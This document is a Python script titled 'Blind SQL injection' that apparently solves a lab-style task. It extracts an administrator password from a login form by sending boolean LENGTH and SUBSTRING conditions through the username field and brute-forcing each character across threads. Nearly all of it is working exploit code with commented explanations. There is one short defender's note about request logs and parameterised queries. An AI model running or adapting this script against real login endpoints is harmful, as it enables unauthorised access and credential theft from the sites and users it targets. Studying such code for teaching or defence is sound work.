Blind SQL injection

import requests
import string
import threading

# === CONFIGURATION ===
# Every probe in this script is a POST to `url`; the only signal it reads back
# is whether `success_indicator` occurs in the response body, which is what
# makes this a boolean-based blind oracle.
# Defender's note: the injected conditions travel verbatim in the `username`
# form field, one request per candidate value against the same endpoint —
# that repetitive pattern is what request logs show. Parameterised queries on
# the server side remove the oracle entirely.
url = "http://example.com/login"  # Replace with actual target
headers = {"Content-Type": "application/x-www-form-urlencoded"}
# Substring test on response.text; any page that happens to contain this text
# (an error or rate-limit page, say) would be read as a "true" result.
success_indicator = "Welcome Message" # Response body
max_length = 100  # upper bound of the length probe loop (1..max_length inclusive)
thread_limit = 10  # positions brute-forced concurrently per batch in main()

# === SHARED STATE ===
# One slot per password position. main() re-binds this to [""] * length once
# the length is known; test_char() fills slots under `lock`. Slots that never
# match stay "" and simply vanish from the final "".join() output.
found_chars = []
# Serialises slot writes and the accompanying print across worker threads.
lock = threading.Lock()

# === FUNCTION TO TEST PASSWORD LENGTH ===
def find_password_length():
    """Probe the administrator password length one candidate at a time.

    Sends one POST per candidate length from 1 to ``max_length`` and returns
    the first candidate whose response body contains ``success_indicator``.
    Returns 0 when no candidate matched (which also covers the case where
    every request failed). A failed request is reported on stdout and the
    next candidate is tried.
    """
    for candidate in range(1, max_length + 1):
        condition = (
            "xyz' AND (SELECT LENGTH(password) FROM users "
            f"WHERE username='administrator')={candidate}"
        )
        form = {"username": condition, "password": "irrelevant"}
        try:
            reply = requests.post(url, headers=headers, data=form, timeout=5)
            matched = success_indicator in reply.text
        except Exception as err:
            print(f"[!] Error testing length {candidate}: {err}")
            continue
        if matched:
            print(f"[+] Password length found: {candidate}")
            return candidate
    print("[-] Failed to determine password length.")
    return 0

# === FUNCTION TO TEST ONE CHARACTER ===
def test_char(position, char):
    """Ask the oracle whether ``char`` sits at 1-based ``position``.

    Builds one injected SUBSTRING comparison, POSTs it, and when the response
    body contains ``success_indicator`` stores ``char`` into
    ``found_chars[position - 1]`` under ``lock``. Returns nothing; a miss
    leaves the slot untouched and a request failure is printed, not raised.
    """
    condition = (
        f"xyz' AND (SELECT SUBSTRING(password,{position},1) FROM users "
        f"WHERE username='administrator')='{char}"
    )
    form = {"username": condition, "password": "irrelevant"}
    try:
        reply = requests.post(url, headers=headers, data=form, timeout=5)
        if success_indicator not in reply.text:
            return
        with lock:
            found_chars[position - 1] = char
            print(f"[+] Found character at position {position}: {char}")
    except Exception as err:
        print(f"[!] Error testing {char} at position {position}: {err}")

# === FUNCTION TO BRUTE-FORCE ONE POSITION ===
def brute_position(position):
    """Run ``test_char`` for every letter and digit at ``position``.

    The alphabet is ``string.ascii_letters + string.digits``. The quote and
    backslash filter cannot match anything in that alphabet, so it is a
    no-op as written. Every candidate is tried even after a hit, so each
    call issues one request per alphabet character.
    """
    alphabet = string.ascii_letters + string.digits
    excluded = "'\"\\"
    for candidate in alphabet:
        if candidate not in excluded:
            test_char(position, candidate)

# === MAIN FUNCTION ===
def main():
    """Recover the password: length first, then every position in parallel.

    Returns early when ``find_password_length()`` yields 0. Otherwise
    re-binds the module-level ``found_chars`` to one empty slot per position
    and runs ``brute_position`` in batches of ``thread_limit`` threads,
    joining each batch before starting the next. The final print joins the
    slots, so positions that never matched are absent from the output rather
    than marked.
    """
    global found_chars

    length = find_password_length()
    if not length:
        return

    found_chars = [""] * length

    batch = []
    for pos in range(1, length + 1):
        worker = threading.Thread(target=brute_position, args=(pos,))
        batch.append(worker)
        worker.start()
        # Wait for a full batch before launching the next one.
        if len(batch) >= thread_limit:
            for th in batch:
                th.join()
            batch = []

    # Drain the final, possibly partial, batch.
    for th in batch:
        th.join()

    print("\n[+] Password guessed:")
    print("".join(found_chars))

# Script entry point; nothing above runs on import.
if __name__ == "__main__":
    main()
